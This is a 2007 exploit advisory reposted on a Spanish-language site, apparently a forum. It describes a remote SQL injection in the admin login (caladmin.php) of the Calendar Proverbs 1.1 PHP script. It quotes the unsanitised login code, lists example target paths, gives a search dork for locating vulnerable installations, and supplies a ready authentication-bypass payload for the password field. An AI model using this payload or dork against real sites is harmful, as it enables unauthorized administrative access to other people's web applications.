Home » Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection

Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection

Enviado por OeX el Lu, 26/11/2007 - 20:52.
autor: 
JosS / Jose Luis Góngora Fernández
http://www.spanish-hackers.com
# Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection
# Download:
# http://www.proverbs.biz/downloads/calendar.zip
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Calendar powered by Proverbs"
# Stop lammer

[*] Vuln Code - caladmin.inc.php

$user = "";
$pass = "";
if (isset($_POST['loginname']) && $_POST['loginname'] != "")
$user = $_POST['loginname'];
if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")
$pass = $_POST['loginpass'];
$loggedin = $this->loginuser($user, $pass);

[*] Simple Sql Injection In:

http://www.example.com/PATH/caladmin.php
http://www.example.com/events/caladmin.php

[*] Exploit:

Username: admin
Password: ' or

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández
  • 491 lecturas

Responder

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.